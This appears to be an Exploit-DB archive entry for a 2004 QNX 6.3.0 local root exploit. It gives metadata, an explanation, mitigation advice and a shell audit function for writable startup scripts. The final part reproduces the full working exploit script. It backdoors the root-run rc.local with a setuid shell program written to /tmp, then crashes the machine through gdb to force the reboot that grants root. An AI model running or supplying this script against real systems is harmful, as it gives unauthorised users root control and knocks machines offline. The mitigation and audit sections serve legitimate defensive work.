Vendor: QNX 6.3.0
By: Kokanin
CVSS: 7.2 (HIGH)
Type: Privilege Escalation
CWE: 264
Product Name: QNX 6.3.0
Affected Version From: QNX 6.3.0
Affected Version To: QNX 6.3.0
Patch Exists: NO
Related CVEs: CVE-2004-0950, CVE-2004-0951
CPE: o:qnx:qnx_6.3.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: QNX 6.3.0
Year: 2004

Local r00t w00t t00t t00t

This exploit chains two vulnerabilities (CVE-2004-0950 and CVE-2004-0951) to obtain root on a default QNX 6.3.0 install: a world-writable startup script and a local system crash triggerable through gdb. It first checks whether /etc/rc.d/rc.local, a script executed as root at boot, is writable by the current user. If it is, it writes a small C program to /tmp/moo.c that calls setuid(0) and spawns /bin/sh, compiles it with make, and appends `chown root /tmp/moo && chmod 6755 /tmp/moo` to rc.local. It then feeds gdb a breakpoint at a fixed address and runs it, which crashes the system; on the following reboot rc.local runs as root and turns /tmp/moo into a setuid-root binary, and running /tmp/moo afterwards gives the local user a root shell. gdb is only the crash trigger here; the privilege gain comes entirely from the root-executed startup script.

Mitigation:

Ensure that /etc/rc.d/rc.local, and every other script under /etc/rc.d, is owned by root and not writable by group or others (for example mode 0644 or 0755). Fixing the permissions removes the privilege escalation outright: the gdb-triggered crash only serves to force a reboot, and any other reboot would do just as well, so the crash alone is a denial of service rather than a path to root.
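The following is an added check for the precondition this exploit depends on; it is not part of the original exploit or of QNX. It is a POSIX shell function that walks a startup-script directory and reports every regular file a non-root local user could modify: world-writable files, files not owned by the expected owner, and group-writable files whose group is not the expected one. It assumes a find(1) that supports `-perm -onum`, `-user` and `-group` (an assumption about the audited host), and the directory /etc/rc.d is the one the exploit targets.

```shell
#!/bin/sh
# Added audit helper (example code, not from the original exploit or QNX).
# audit_startup_dir DIR [OWNER] [GROUP]
#   Prints each regular file under DIR that a non-privileged user could edit,
#   one path per line, sorted. Returns 1 if any were found, 0 otherwise.
#   OWNER and GROUP default to root; pass others only for testing.
# Assumption: find(1) understands -perm -onum, -user and -group (POSIX).
audit_startup_dir() {
    dir="$1"
    owner="${2:-root}"
    group="${3:-root}"
    # -perm -0002: others-write bit set (world-writable)
    # ! -user:     not owned by the expected owner (owner may chmod at will)
    # -perm -0020 ! -group: group-writable and the group is not the trusted one
    hits=$(find "$dir" -type f \( -perm -0002 -o ! -user "$owner" \
            -o \( -perm -0020 ! -group "$group" \) \) -print | sort)
    [ -n "$hits" ] || return 0
    printf '%s\n' "$hits"
    return 1
}

# Usage on a live system: audit_startup_dir /etc/rc.d
# The exploit's own precondition, [ -w /etc/rc.d/rc.local ], corresponds to
# rc.local appearing in this listing for the user running the check.
if [ "$#" -gt 0 ]; then
    audit_startup_dir "$@"
fi
```

A non-zero exit with an empty listing from this function on a default install is the expected state; any path printed is a file a local user can turn into a root-executed payload in exactly the way the script above does.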

Exploit-DB raw data:

#!/bin/sh
# this combines http://www.idefense.com/intelligence/vulnerabilities/display.php?id=387
# and http://www.idefense.com/intelligence/vulnerabilities/display.php?id=386
# into local r00t w00t t00t t00t, hugs and kisses from www.lort.dk.
# unset PAGER; man chmod | mail -s "urgent reading" support@qnx.com
# kokanin discovered this around august/september 2004
#
# Flow: if rc.local (run as root at boot) is writable, drop a setuid-shell
# helper in /tmp, build it with make's implicit rule, append a chown+chmod
# for it to rc.local, then crash the box via gdb so it reboots and the
# appended line executes as root. After the reboot, run /tmp/moo for a shell.
# chown must precede chmod: chown clears the setuid bit.
echo "performing check"
if [ -w /etc/rc.d/rc.local ] ;
then echo "check passed, backdooring system" &&
cat >/tmp/moo.c << __EOF__ && cd /tmp && make moo && echo "chown root /tmp/moo\
&& chmod 6755 /tmp/moo" >> /etc/rc.d/rc.local && echo "rc.local backdoored,\
 crashing system" && echo -e "break *0xb032d59f\nr\ncont\ncont" | gdb gdb;
#include <stdlib.h>
#include <unistd.h>
/* Once root-owned and mode 6755 the effective uid is 0; setuid(0) then
   makes the real uid 0 as well before the shell is spawned. */
int main(void){
setuid(0);
system("/bin/sh");
return 0;
}
__EOF__
else echo "system is not a default QNX 6.3.0 install, or someone set correct permissions manually, sorry";
fi

# milw0rm.com [2006-02-08]